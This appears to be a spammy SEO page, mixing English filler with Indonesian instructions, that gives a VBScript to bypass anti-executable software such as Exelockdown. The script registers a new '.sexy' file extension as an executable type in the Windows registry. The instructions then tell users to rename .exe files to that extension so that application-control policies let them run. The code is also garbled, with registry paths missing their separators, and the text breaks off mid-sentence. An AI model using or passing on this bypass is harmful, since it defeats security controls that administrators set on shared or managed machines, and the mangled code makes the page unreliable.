CARA BOBOL ANTI EXECUTABLE ALERT On this site you will find valuable complete information about the CARA BOBOL ANTI EXECUTABLE ALERT that may have been many scattered from internet
but here the information will always be CARA BOBOL ANTI EXECUTABLE ALERT update from days to days or years to years.
Avaliable topic CARA BOBOL ANTI EXECUTABLE ALERT in here. Just please bookmark this site because people often forget the many who have visited the website.

Therefore a lot of software to make a bookmark automatically but we recommend that you use in a way can ctrlD
This CARA BOBOL ANTI EXECUTABLE ALERT topic will be discussed thoroughly so you will take a very long time to be quite gather this information.

then please visit your site's main page because we will be there, CARA BOBOL ANTI EXECUTABLE ALERT you get information about the CARA BOBOL ANTI EXECUTABLE ALERT
after Download you can save directly to your computer.

thx for visiting us

const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
QUOT = chr(34)
strComputer = “.”
On error resume next
Tanya = MsgBox(”By Pass Exelockdown dengan Registry Shell Spawning”& _
vbNewLine & “Reset Exelockdown?”, 36,”Exelockdown Hacking – by Lovepassword”)
If Tanya = 6 Then ‘Bila dipilih YA
Set objRegistry = GetObject(”winmgmts:{impersonationLevel=impersonat e}!\” &strComputer & ” ootdefault:StdRegProv”)
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexy”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,,”exefile”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,”Content Type”,”application/x-msdownload”
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexyPersistentHandler”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexyPersistentHandler”,,”{098f 2470-bae0-11cd-b579-08002b30bfeb}”
objRegistry.CreateKey HKEY_CURRENT_USER, “SoftwareMicrosoftWindowsCurrentVersionExplorerAdv anced”
objRegistry.SetDWORDValue HKEY_CURRENT_USER,”SoftwareMicrosoftWindowsCurrent VersionExplorerAdvanced”,”HideFileExt”,0
Set objWMIService = GetObject(”winmgmts:” _
& “{impersonationLevel=impersonate}!\” & strComputer & ” ootcimv2?)
Set colProcessList = objWMIService.ExecQuery _
(”SELECT * FROM Win32_Process WHERE Name = ‘explorer.exe’”)
For Each objProcess in colProcessList
set objShell = createobject(”Wscript.Shell”)
objShell.Run “explorer.exe”
msgbox “Copi file exe, rename menjadi file sexy, lalu jalankan”,vbInformation,”Exelockdown Hacking – by 060183”
End If

Silakan copy paste di notepad lalu pilih all files dan simpan dengan extensi .vbs.. jalankan…
Kemudian ubah extensi file .exe jadi .sexy Maka anda selamat dari pencekalan software anti executable.contoh seperti aplikasi ninja.exe klo kita ingin jalankan harus di ubah ekstensi nya jadi